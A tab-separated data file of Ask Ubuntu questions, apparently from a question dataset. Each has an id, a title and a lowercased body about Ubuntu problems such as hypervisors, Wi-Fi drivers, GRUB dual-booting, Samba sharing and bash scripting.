243342	is there an open source alternative to vmware vsphere server ? like a ubuntu or similar distro with virtualization hosting built in ?	i am looking at turning my old dell 2650 and 2950 servers into vmware vsphere servers , however vsphere is very very expensive . is there an open source alternative that provides the same performance as vsphere in a ubuntu or debian distro ? i dont actually mean `` virtual box '' or `` vmware player '' but rather a server hypervisor that is easy to set up and host virtual machines on my network ?
243346	how to run a command as a user whose login is disabled ?	i am trying to use the su command to run an application as another user in this case i am trying to run irssi blah @ ubuntu : su - [ username ] irssi ( enter password ) blah @ ubuntu : ( nothing happens ) blah @ ubuntu : su - [ username ] -c irssi ( nothing ) i run gksu and set same parameters and it works , and does n't ask me for the user password . what is the issue ? and how do i solve it ? i should note the user was created like this adduser -- system -- disabled-login [ username ] if it makes any difference ... .sigh .
243347	where is `` places '' in 12.04 ?	i moved from 10.04 to 12.04 tonight and i 'm lost . i ca n't find partitions of drives . i installed the classicmenu indicator but that does n't have a `` places '' option on it . where is everything ? i just want to see all my drives/ partitions etc in one place whether they 're mounted or not . i 'm sure there is something like that here but i have no idea where . thanks for any help .
243351	server does not load index.php	i have just installed the lamp-server package on a new ubuntu 12.10 installation . it went fine . i tested on localhost/ and got the expected response . the i created an index.php file loading localhost/index.php works fine but loading localhost/ does not . here a download of a ~ file is started . i tried creating a .htaccess file contain only this line in the /var/www : directoryindex index.php index.html index.cgi
243360	how to uninstall the libre softwares using terminal ?	i really do not need the libre , calc , word , impress and all those stuff . can you please tell me , which package must i use , in the terminal ?
243362	how do i add the latex backport ppas to synaptic in 12.04 ?	i would like to synaptic to have access to the repository files on this website : http : //www.tug.org/texlive/debian.html i have tried typing in the web page in the appropriate place , but that does not seem to work . there is a further problem : when i do the apt-get install texlive it goes right to the 2009 version . if i add the 2012 version on the website , does that mean that it wont work with 12.04 ?
243366	not able to connect to my wireless router	i have just installed ubuntu 12.10 in my laptop . i am not able to connect to my d-link n150 wireless router which i was able to do when i had windows xp . the problem everytime i log on to my ubuntu , a window would pop up now and then saying : '' authentication required by wireless network '' . when i type in the password , the wireless icon would blink for a second and again the window pops up . i googled on this and followed all the steps to find out what is going wrong from my os . i could n't figure out anything . please help me to fix this issue . what i did whether my wireless adapter is recognized ? yes it is . the below logs say that . sudo lshw -c network *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:1b:77:8e:46:61 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driver version=3.5.0-17-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:44 memory : edf00000-edf00fff whether my wireless device drivers are installed ? i guess drivers for pro/wireless 3945abg [ golan ] by intel are preinstalled in this ubuntu version.the above logs driver=iwl3945 driver version=3.5.0-17-generic firmware=15.32.2.9 says that drivers are there . but i am not sure whether the version3.5.0-17 is supported by my wireless adapter 3945abg . i tried this command rfkill list to see if the wireless is blocked ? soft blocked : no hard blocked : no in my network connection manager i have the following settings : ssid : ******** mode : infrastructure ipv4 settings - method : automatic ( dhcp ) addresses only ipv6 settings - i have made it ignore wireless security : wpa & wpa2 personal . more info i have installed ubuntu 12.10 from a usb stick where i was able to connect to my wireless network during installation . the additional drivers tab in the software sources center is empty . i have no idea why it is empty ( if in case i need to install any extra drivers to fix this wireless problem of mine ) . i have spent three days googling to fix this issue . i am still hopeful i would be able to fix this with yours help . logs from var/log/syslog 12 wpa_supplicant [ 784 ] : wlan0 : sme : trying to authenticate with cc : b2:55 : de : c6 : b3 ( ssid='balasourav ' freq=2462 mhz ) 12 kernel : [ 192.089495 ] wlan0 : authenticate with cc : b2:55 : de : c6 : b3 12 kernel : [ 192.090744 ] wlan0 : send auth to cc : b2:55 : de : c6 : b3 ( try 1/3 ) 12 wpa_supplicant [ 784 ] : wlan0 : trying to associate with cc : b2:55 : de : c6 : b3 ( ssid='balasourav ' freq=2462 mhz ) 12 networkmanager [ 721 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > associating 12 kernel : [ 192.092577 ] wlan0 : authenticated 12 kernel : [ 192.096043 ] wlan0 : associate with cc : b2:55 : de : c6 : b3 ( try 1/3 ) 12 kernel : [ 192.098785 ] wlan0 : rx assocresp from cc : b2:55 : de : c6 : b3 ( capab=0x411 status=0 aid=2 ) 12 wpa_supplicant [ 784 ] : wlan0 : associated with cc : b2:55 : de : c6 : b3 12 kernel : [ 192.100161 ] wlan0 : associated 12 networkmanager [ 721 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake 14 kernel : [ 194.003603 ] wlan0 : deauthenticating from cc : b2:55 : de : c6 : b3 by local choice ( reason=3 ) 14 networkmanager [ 721 ] : < warn > activation ( wlan0/wireless ) : association took too long . 14 networkmanager [ 721 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] 14 networkmanager [ 721 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets 14 wpa_supplicant [ 784 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 14 networkmanager [ 721 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > disconnected 14 networkmanager [ 721 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . 14 kernel : [ 194.034050 ] cfg80211 : all devices are disconnected , going to restore regulatory settings 14 kernel : [ 194.034061 ] cfg80211 : restoring regulatory settings 14 kernel : [ 194.034068 ] cfg80211 : calling crda to update world regulatory domain 14 kernel : [ 194.041065 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain 14 kernel : [ 194.041071 ] cfg80211 : world regulatory domain updated : 14 kernel : [ 194.041074 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) 14 kernel : [ 194.041077 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) 14 kernel : [ 194.041080 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) 14 kernel : [ 194.041083 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) 14 kernel : [ 194.041086 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) 14 kernel : [ 194.041089 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) 23 networkmanager [ 721 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed 23 networkmanager [ 721 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed 24 networkmanager [ 721 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... 24 networkmanager [ 721 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... 24 networkmanager [ 721 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] 24 networkmanager [ 721 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... 24 networkmanager [ 721 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . 24 networkmanager [ 721 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... 24 networkmanager [ 721 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] 24 networkmanager [ 721 ] : < info > activation ( wlan0/wireless ) : connection 'balasourav ' has security , and secrets exist . no new secrets needed . 24 networkmanager [ 721 ] : < info > config : added 'ssid ' value 'balasourav' 24 networkmanager [ 721 ] : < info > config : added 'scan_ssid ' value '1' 24 networkmanager [ 721 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' 24 networkmanager [ 721 ] : < info > config : added 'psk ' value ' < omitted > ' 24 networkmanager [ 721 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . 24 networkmanager [ 721 ] : < info > config : set interface ap_scan to 1 ( numbers are the seconds from the timestamp )
243367	xvfb and xnest not working with gl clients	i am trying to test an application using xvfb or xnest to prevent constant popups to disrupt my work . unfortunately , both xnest and xvfb make my client crash with a segfault . xvfb does not provide any feedback for what 's going on , but xnest specifically complains about the lack of nv-glx extensions . everything works well and with the nvidia drivers on my desktop . i use ubuntu 12.04
243368	using ubuntu one in kubuntu	i 've been an ubuntu user for some time but now looking at moving to a kde desktop and thinking about installing kubuntu on my newly rebuilt laptop , however i have an ubuntu one account and use it a great deal . from what i 've been reading there are problems running the ubuntu one client on kubuntu , therefore am i better off installing ubuntu ( 12.10 ) and simply adding the kde desktop afterwards ? would my ubuntu one client still function in the kde environment ? ? ? any help appreciated ! fozzit
243373	two web servers on a lan with dynamic ip with ubuntu server 12.04	my situation is so that i have two different ubuntu server with apache and dns server installed on them each of which serves and hosts a couple of websites . before i had static ip 's for them with port forwarding but now i have just an adsl dynamic ip at my new place ! i have my router ( d-link ) connected behind to the adsl router . how can i solve this problem and resolve dynamic ip 's so that i do not need to configure servers every day ? i read a little bit about dyndns and would like to know how can i have ddclient installed without having dyndns account ? is there any free solution for my problem on linux ? how can i do that ?
243376	why am i unable to do anything with my extended partition ?	i have an extended 52-gigs partition that i ca n't seem to see from linux , i ca n't mount it , delete it nor format it . how can i reclaim that drive back , i want the space . i manually installed my system from the live ubuntu dvd . as i mentioned before , i 'm using now a normal ubuntu 11.10 . this drive has been like this for a long time , but i 've been very lazy to fix the problem when it happened . but now , i need the space . i tried to mount it , did n't work , tried to do something with it using some gui apps , like gparted and that disk utility tool that comes with ubuntu , they did n't give me any options to do with the drive , except for deleting , which did n't work , gave me the message that you see in the picture here thank you so much for any help : ) edit : here 's the output of the 'sudo fdisk l- '
243380	how to create a read-only link to a directory ?	one of my scripts dynamically creates a symlink like so : ln -s /home/hosting/projects/images /home/hosting/projects/demo/images how can i make it so that the access through link is read-only ?
243381	lightdm does n't run the display-setup-script script	to fight with dual-monitor resolution problems , i followed the advice found in other questions here related to session- and display-setup-script . i have the following /etc/lightdm/lightdm.conf : [ seatdefaults ] user-session=ubuntu greeter-session=unity-greeter allow-guest=false display-setup-script=/usr/bin/dualmon.sh session-setup-script=/usr/bin/dualmon.sh i also have the following ( executable ) /usr/bin/dualmon.sh that i created : # ! /bin/bash xrandr -- output lvds1 -- auto -- left-of hdmi1 -- output hdmi1 -- auto # notify-send dualscreen activated touch /home/shade/desktop/touched however , the resolution is wrong both at the login screen and after i log in . also , the file /home/shade/desktop/touched is not there . when i run the dualmon.sh script manually ( after i log in ) , the resolution is set correctly . this makes me think that the scripts are not run at all . what is the cause of this and how can i fix it ?
243383	cpu usage on asus 1015bx using vaapi ( lubuntu 12.10 )	i installed and configured vaapi support and mplayer-vaapi on my asus 1015bx . now when watching 1080p hd movies the average cpu usage is around 25 % . is it a correct usage ? or it is still too much ? my laptop : asus 1015bx cpu : amd c-60 dual core 1.00 ghz gpu : radeon 6290
243385	ubuntu 12.10 not starting after usb install on a netbook	i 'm trying to install ubuntu 12.10 on a asus eee pc `` flare series '' from a usb key made with lili ( linux live usb creator ) . the installation process seems to work fine until it asks to reboot the netbook . then , it only displays a black screen with a blinking white `` _ '' with no possible interaction . i 've tried to run it in live-disk mode from the usb key , with exactly the same result . the only thing that seems to interact with it is pressing the power button : it seems then to shut down properly , displaying several lines like `` exiting acpid '' to `` will now halt '' . i 've tested the usb key on another computer , and it works fine . the netbook is less than 2 days old .
243387	how can i backup my programs/applications , so that after i reinstall a new one , i can still use the backup-ed ones ?	is there a way , that i could backup all my programs , all apps , put them in a directory or something , so that i could install them quickly next time , without having to manually going over the app center , downloading them from terminal , etc ? note that i might import them from a distro other than the one i exported them on . so , say i 'm in ubuntu , exported some stuff , and then installed bt and wanted to import them from there .
243389	why does n't gimp support cmyk ?	why does gimp not support cmyk ? this is a feature that i really need as a user and i do n't know why it is not supported in gimp by default . is there possibly a way of which i could add support for it via an extension or plugin ? should this turn up nothing , would there be another software program with cmyk support which would run on ubuntu ?
243394	how to install specific versions of google chrome / chromium ?	i 'm looking for standalone packages for google chrome / chromium which can be extracted and used as binaries for my selenium test suite . how do i go about such a thing ?
243397	xubuntu : disable gnome-keyring	i 'm using xubuntu , since gnome and unity are too heavy for my netbook . i want to disable 'gnome-keyring ' prompts . i tried sudo apt-get remove gnome-keyring which results : the following packages will be removed : gnome-keyring oneconf python-ubuntu-sso-client software-center ubuntu-sso-client ubuntu-sso-client-gtk xubuntu-desktop do you want to continue [ y/n ] ? and of course i did n't confirm that ! because it will remove the whole xubuntu-desktop and software-center ! ! can someone help ?
243402	how to add ubuntu 12.04 lts to debian 6.0 's grub ?	i installed debian because debian runs better on my pc than ubuntu . i installed debian on an another partition because i wondered to dualboot with ubuntu . and after debian installed , i see in the grub menu only : gnu/linux debian 2.xx.xxx.xx ( or something like this ) gnu/linux debian 2.xx.xxx.xx ( recovery mode ) ( or something like this ) and ubuntu is missing ... is there any way to add ubuntu to the grub ? [ i already googled , but there 's nothing about add ubuntu to grub . ] the grub version in debian is : ~ $ dpkg -l | grep grub ii grub-common 1.98+20100804-14+squeeze1 grand unified bootloader , version 2 ( common files ) ii grub-pc 1.98+20100804-14+squeeze1 grand unified bootloader , version 2 ( pc/bios version )
243407	how to use esc key for emacs	when typing esc within an emacs window under unity ( emacs 23 standard package ) , the sound is turned on/off , but emacs does not receive the key . how can i change ( probably ) unity such that the esc and also the other function keys are interpreted by emacs ? a very crude workaround that always works in ( gnu ) emacs is to use c- [ in place of esc . the question why is the meta key is not working when using emacs ? does not apply because this was about using emacs within a gnome-terminal , but i use emacs directly under x . another option is to type fn-esc which produces esc within emacs and also works for the function keys ; but i want the keys directly . edit : for some reasons that i can not reproduce , esc now works ... it might be related to doing some xmodmaps .
243409	are dconf schema names case-sensitive ?	i have found an example of a schema that is referred two in two different ways , differing only in case , which is confusing to me . gsettings sees the schema name as com.canonical.unity.launcher , and does not accept com.canonical.unity.launcher as a valid schema name . on the other hand , dconf-editor only sees com.canonical.unity.launcher all lower-case , as seen in the screenshot . if i change the key favorites in gsettings , that change is reflected in dconf-editor , and vice-versa . what 's going on ? which is the correct schema name , com.canonical.unity.launcher , or com.canonical.unity.launcher ? gsettings : $ gsettings list-schemas | grep -i com.canonical.unity.launcher com.canonical.unity.launcher david @ david-aspire-5735 : ~ $ $ gsettings list-recursively com.canonical.unity.launcher com.canonical.unity.launcher favorite-migration '3.2.10' com.canonical.unity.launcher favorites [ 'application : //firefox.desktop ' , 'application : //thunderbird.desktop ' , 'unity : //running-apps ' , 'unity : //expo-icon ' , 'unity : //devices ' ] david @ david-aspire-5735 : ~ $ gsettings list-recursively com.canonical.unity.launcher no such schema 'com.canonical.unity.launcher' dconf-editor :
243411	how do i boot ubuntu in virtualbox complaining that my cpu is incompatible ?	after a long time spent with os from boys from redmont i would like to try something new . i decided to try some linux editions , also ubuntu linux . i am completely new to this matter , this is also my first question here . i am trying to install ubuntu on vm created with virtualbox . i installed succesfully linux fedora 2011 and linux mandriva , they are running well . unfortunately i can not install any of the available ubuntu versions . i downloaded and tried all four iso files available on ubuntu site ( ubuntu 12.10 32 bit and 64 bit , ubuntu 12.04 lts 32 and 64 bit ) but none of them would work . 64 bits versions complain that my cpu is not 64bit compatible , 32 bit version complain that my cpu does not have proper functionality ( pae ) . my cpu is intel i5-2430m . maybe something else is wrong ? but what could that be ? i appreciate your help .
243412	installing rtl8188ru in ubuntu 12.04	i 'm new to ubuntu/linux . after installing ubuntu 12.04 i 'm not sure how to configure/install rtl8188ru wifi adapter . anybody who can show me the easiest way to install the driver please .
243415	how to implicitly raise windows under unity ?	i open system settings . then i do something else and thus hide the system settings window . i forget that i have left system settings open . now i again try to open system settings , but it does not react . to use system settings i have to find the window i left open . how can i configure unity so that the window raises in step 4 or does anything that simplifies step 5 ?
243423	xmllistmodel syntax error ? currency converter	i 've followed the currency converter `` hello world '' tutorial , as far as i can see exactly how it should . yet when i try and run it via qmlscene i get a syntax error on line 45 . line 45 is : xmllistmodel { id : ratesfetcher source : `` http : //www.ecb.int/stats/eurofxref/eurofxref-daily.xml '' namespacedeclarations : `` declare namespace gesmes='http : //www.gesmes.org/xml/2002-08-01 ' ; '' + '' declare default element namespace 'http : //www.ecb.int/vocabulary/2002-08-01/eurofxref ' ; '' query : `` /gesmes : envelope/cube/cube/cube '' onstatuschanged : { if ( status === xmllistmodel.ready ) { for ( var i = 0 ; i < count ; i++ ) currencies.append ( { `` currency '' : get ( i ) .currency , `` rate '' : parsefloat ( get ( i ) .rate ) } ) } } xmlrole { name : `` currency '' ; query : `` @ currency/string ( ) '' } xmlrole { name : `` rate '' ; query : `` @ rate/string ( ) '' } } any ideas what i 've messed up here ? this is the link for complete code .
243425	how does ubuntu know it is connected to the internet ?	how does ubuntu know whether i am connected to the internet or not ? it seems to know because of the notifications it shows when i connect or disconnect ( or is that the network manager not the os ? ) how do the background sync services know when i am connected and when to sync data ? does the os have an indicator ( something of the sort : we 're online guys , go sync or do whatever you want ) or it is up to individual programs to try every time period to check connectivity ? is there something similar to the windows connectivity status indicator where microsoft detects internet connectivity ( not just any network connectivity ) ? i am asking because sometimes i connect to the internet via sakis3g script using usb modem , and the network manager status is offline when i do so . so i was wondering if background services know if i am connected or not ( or i have to tell them myself ) ...
243428	how to get hdmi port to output to monitor ?	i have an external dell p2412h monitor attached to the hdmi port of my laptop running ubuntu 12.04. xrandr reports : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 256mm x 144mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) it looks like the it does not recognise the monitor attached . this is what xrandr reports when connected via vga : screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 256mm x 144mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) please any ideas would be useful . please keep in mind that i 'm very new to ubuntu , so i 'd prefer some step-by-step instructions .
243430	how do i create a file system / partition / volume that would appear in the side bar of my file manager ?	is there a specific mount point to use for a partition so that it would appear separately in the side pane ? i mean that it would appear separately in the left pane of pcmanfm or thunar the way windows-partition and external usb devices appear . ( i do not mean it being the /home partition . nor it being something like /boot because this would not display it as a partition on the left pane but it would look as a folder with that address ( see this question ) . would ( any ) such partition be kept after reinstall ? are there possible mount points with any name after / - like /somename ? i wonder whether what i ask here is possible . i guess this question is very contaminated by the windows experience . ) here 's a picture of the left pane in pcmanfm with the windows partition ( not mounted yet ) p.s . this question is not about changing my present partitions , i just want to know if that is possible . i 'm in lubuntu 12.10 . edit after answer and comments : i have an answer+comments saying that the partition should not have a mount point specified in order to achieve the asked result . how to create a partition ( whether during or after install procedure ) without setting the mount-point ?
243432	how to install new lxpanel in lubuntu 12.04 ?	lubuntu 12.04 has lxpanel 0.5.8 , while lubuntu 12.10 has lxpanel 0.5.11 , which has enhanced features - see this question .
243433	12.04 64bit installation hangs at `` copying installation logs ''	when i install 12.04 64bit from cd , the installation hangs at `` copying installation logs '' . i checked the iso is correct and burned the cd at the slowest speed . i also tried to install from usb stick , same result . also tried installing from `` try ubuntu '' ( live cd ) , same result . any suggestions what else i might try and a fix ?
243434	can i play league of legends in ubuntu ?	i want to play league of legends ( lol ) on my laptop which runs ubuntu 12.04 . is there any way to play that game on my ubuntu laptop ?
243435	not able to understand and map output of /proc/net/tcp	the output of /proc/net/tcp on my ubuntu 12.10 is the following : sl local_address rem_address st tx_queue rx_queue tr tm- > when retrnsmt uid timeout inode 0 : 0100007f:0cea 00000000:0000 0a 00000000:00000000 00:00000000 00000000 115 0 14759 **1 0000000000000000 100 0 0 10 -1** so as we can see that the number of data columns displayed are more then the names of the columns . so if i see in the end , i can find the following : uid - > 115 timeout- > 0 inode- > 14759 can some one tell what are the values after inode column , i.e . 1 0000000000000000 100 0 0 10 -1
243438	ip messenger error on ubuntu 12.04	i installed ip messenger ( gnome 2 ) from ubuntu software center but its not working . it 's always showing an error message on ubuntu 12.04 . filename : ipmsg.c function : create_lock_file line:157 can not setup lock file : /tmp/g2ipmsg.lock errno : -11 ( resource temporarily unavailable )
243439	how do i troubleshoot an unstable internet connection in precise after trying to install package with synaptic ?	i was trying to install packages with synaptic . the internet connection cut off , and now is extremely unstable . it is not a problem with the internet connection itself because now i am on windows . how do i troubleshoot this ?
243447	menus on global menu bar not showing , but are selected	this seems to be a strange problem . please refer to the attached screenshots . in the menu where i have clicked on glipper , the menu is hidden behind the window . only way to see the menu is to minimize all the windows . also , in the second screenshot i have clicked on the view menu , and it doesnt show the menu . however , if i click on the space where the menu would have been , the items are activated . i was able to goto full screen mode that way ! i also can not open context menus in any application . but if i press the shortcut key , the action is performed . i am running ubuntu 12.04.1 lts on a lenovo g570 . iirc , it has been updated on 15th jan , 830 am ist . i was not able to find a bug report or anything , since i was not able to find the right words . would gladly +1 the bug report if any .
243448	crt certificate not appearing in menu for selection	i 'm trying to set up the vpn for my university on my laptop . i have downloaded to certificate file and put it in ~/misc/cacert.crt . when i try to set up the vpn , i click on the ca certificate option and navigate to ~/misc/ in the selection menu . the certificate does not appear there . the folder appears empty . i tried adding a new version of the file that is named differently , also does n't appear in the menu . i can double click on the file in nautilus and it brings up a little box with the details of the certificate , so there 's nothing wrong with the file . any idea what 's causing this bizarre problem ? i 've found something out . if i do file cacert.crt i get data whereas if i do file on a .crt certificate that does show up ( which i found in /etc/ssl/certs/ ) then i get pem certificate . so presumably having .crt is not enough and the vpn setup wants file to return a valid certificate type ? how do i change this ? grep 'crt ' /etc/mime.types gives me application/x-x509-ca-cert which , as i understand it , should mean that *.crt files are recognised as certificates . so why is my cacert.crt only appearing as data ?
243450	how do i get the same wi-fi speed under ubuntu as under windows ?	i 'm running ubuntu 12.10 and windows 8 on my laptop . in windows , using wireless connection , average speed and ping to google.com is 60kbps and less than 25 ms , but in ubuntu , top internet speed only reach 10 kbps and ping reach 12000 ms , that 's happen not only on browser but on entire system like gwibber or apt-get . how do i make it as fast as on windows ? note : my wifi hotspot is a pc running latest version of connectify . update : everytime wifi connected to connectify hotspot , i always get this message : network service discovery disabled . your current network has a .local domain , which is not recommended and incompatible with the avahi network service discovery . the service has been disabled . update : sudo lshw -c network give me this : *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 74:2f:68 : f1 : b3:1e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.5.0-21-generic firmware=n/a ip=192.168.251.102 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport:2000 ( size=256 ) memory : f0500000-f0503fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : c8:9c : dc:10 : fa:47 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:3000 ( size=256 ) memory : f0900000-f0900fff memory : f0a04000-f0a07fff and lsmod give me this : module size used by snd_hda_codec_hdmi 31423 1 snd_hda_codec_realtek 63493 1 joydev 17161 0 snd_hda_intel 32515 3 parport_pc 31968 0 arc4 12473 2 snd_hda_codec 111547 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 80163 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25382 1 snd_seq_midi i915 457181 3 rtl8192ce 52841 0 rtl8192c_common 47075 1 rtl8192ce coretemp 13168 0 ppdev 12817 0 rtlwifi 64137 1 rtl8192ce btusb 17986 0 uvcvideo 71277 0 psmouse 84843 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51255 2 snd_seq_midi , snd_seq_midi_event drm_kms_helper 47303 1 i915 snd_timer 24411 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq videobuf2_core 32070 1 uvcvideo drm 238768 4 i915 , drm_kms_helper videodev 95841 2 uvcvideo , videobuf2_core bnep 17707 2 rfcomm 37276 12 mac80211 461161 3 rtl8192ce , rtl8192c_common , rtlwifi kvm_intel 126745 0 kvm 357806 1 kvm_intel bluetooth 183228 22 btusb , bnep , rfcomm i2c_algo_bit 13197 1 i915 cfg80211 175375 2 rtlwifi , mac80211 snd 61991 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device sparse_keymap 13658 0 video 18847 1 i915 mac_hid 13037 0 videobuf2_vmalloc 12756 1 uvcvideo mei 35796 0 videobuf2_memops 13184 1 videobuf2_vmalloc wmi 18590 0 soundcore 14599 1 snd microcode 18209 0 serio_raw 13031 0 snd_page_alloc 14036 2 snd_hda_intel , snd_pcm lpc_ich 16925 0 binfmt_misc 17260 1 lp 13299 0 parport 40753 3 parport_pc , ppdev , lp hid_generic 12445 0 usbhid 41702 0 hid 82142 2 hid_generic , usbhid r8169 55976 0
243460	how can ccsm 's `` show desktop '' animation be made quicker ?	in ccsm , under general options , key bindings , there is a `` show desktop '' action . i use it quite often but the animation is too slow for me . is there a way to speed it up ( or turn it off ) ?
243461	how can i connect to a samba server using it 's hostname instead of the ip ?	i am a beginner when it comes to linux , and have recently put together a media server , holding all my movies , running ubuntu 12.04 . after following tutorials and forums i can successfully ping , by hostname and ip , my windows desktop box and my media server ubuntu box fine , and vice versa . i have configured samba to set up a share called movies on my media server . i have set up an account on samba using my linux username , windows username with my linux password . my ubuntu box is now visible on my network tree on my win7 box , as is the movies share . however when i try to access the movies share from the win7 box i do not have permission to do so . i have noticed that by using the static ip address i issued my ubuntu media server , i can access the share with ease . however i would like to be able to resolve the issue and access the share using the hostname of my ubuntu meda server box . sorry if i am a bit unclear in my set up ! thanks
243464	bash function to open git repository with browser	i 'm trying to create a bash function so i can get this . the user , via terminal , goes to the git project path like : /home/daniel/projects/my_super_project so the user will type open and the browser will open in the github.com like : http : //github.com/bla/my_super_project.git so far i have this code : function teste { if [ -d .git ] ; then remotes= $ ( git remote -v | awk -f'git @ github.com : ' ' { print $ 2 } ' | cut -d '' `` -f1 ) url= '' https : //github.com/ '' url= '' $ url $ ( $ remotes | cut -d '' `` -f1 ) '' # here i 'll open the browser else # git rev-parse -- git-dir 2 > /dev/null ; echo `` not a git repo '' fi ; } i check if there is a .git folder , if so , i look for the remote origin and get its value that is inside the remote_url . i was trying to concatenate the https : //github.com with the remote_url but no success because the terminal think it is a path so i get this : bash : bla/my_super_project.git : no such file or directory how can i concatenate these two values ?
243468	installing zsnes on lubuntu	how do i install zsnes on lubuntu ? i 've already updated synaptic and ran sudo apt-get install zsnes , it came up with this error : > reading package lists ... done building dependency tree reading state information ... done package zsnes is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'zsnes ' has no installation candidate is there a way i can fix this , or another way to install zsnes on lubuntu ?
243469	how do i exclude a directory by name using find ?	i have a lot of directories on my system , with a structure looking like this : \ -- -- -data \ -- -- -- - 001abc \ -- -- -- - 002abc \ -- -- -- - 003abc \ -- -- -- - 004abc \ -- -- -- - 005abc \ ... . when i want find a certain directory , i just type find . -iname `` 002abc* '' but how can i find a directory excluding certain name matches ? something like this in mysql select * from folder where filename ! = '0021bc'
243471	can not boot to windows 7 after installing ubuntu 12.10 and run boot-repair	i originally had win 7 installed , after installed ubuntu 12.10 , i am failed to boot ubuntu . i set ubuntu as my first boot sata ha thanks for any suggestions ! ! ! http : //paste.ubuntu.com/1534279/
243472	ca n't boot windows vista after installing ubuntu	i 'm very new to ubuntu , and have come to this point that i ca n't boot back to my windows vista anymore . i thought that i would get some kind of dual boot in the beginning when booting my computer , but this does n't seem too happen and i do n't have the slightest idea on how to fix this . i was looking for help here at askubuntu , but i could n't seem to find anything . i 'm too new with this software . i 'll need hints and tips on how to fix this thanks for your time folks !
